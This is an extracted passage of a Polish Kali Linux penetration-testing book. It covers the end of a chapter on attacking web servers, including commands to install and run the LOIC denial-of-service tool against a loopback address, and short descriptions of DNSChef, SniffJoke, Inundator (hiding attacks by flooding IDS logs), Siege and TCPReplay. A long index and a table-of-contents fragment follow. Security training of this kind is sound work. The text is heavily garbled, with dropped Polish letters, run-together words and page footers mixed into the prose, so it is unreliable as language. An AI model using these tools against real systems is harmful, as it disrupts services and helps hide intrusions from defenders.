Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 2: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

O autorach 9

O recenzentach 11

Wst p 15

Co znajdziesz w tej ksi ce 16Czego potrzebujesz do pracy z ksi k 17Dla kogo przeznaczona jest ta ksi ka 17Konwencje 18Errata 18Piractwo 19

Rozdzia 1 Przygotowania 21

Podstawowe za o enia testoacutew penetracyjnych aplikacji internetowych 23Metodologia przeprowadzania testoacutew penetracyjnych 24

Ocena ryzyka 30Testy penetracyjne z wykorzystaniem systemu Kali Linux mdash za o enia 34

Etap 1 Rekonesans 34Etap 2 Wyszukiwanie podatno ci 35Etap 3 Wykorzystywanie zidentyfikowanych podatno ci 36Etap 4 Podnoszenie uprawnie 37Etap 5 Utrzymanie zdobytego przyczoacute ka 37

Wprowadzenie do systemu Kali Linux 38Konfiguracja systemu Kali Linux 39

Uruchamianie systemu Kali Linux z no nika zewn trznego 39Instalowanie systemu Kali Linux 40Kali Linux i pierwsze uruchomienie w maszynie wirtualnej 46

Przegl d narz dzi dost pnych w systemie Kali Linux 46Podsumowanie 49

Kup książkę Poleć książkę

Spis tre ci

4

Rozdzia 2 Rekonesans 51

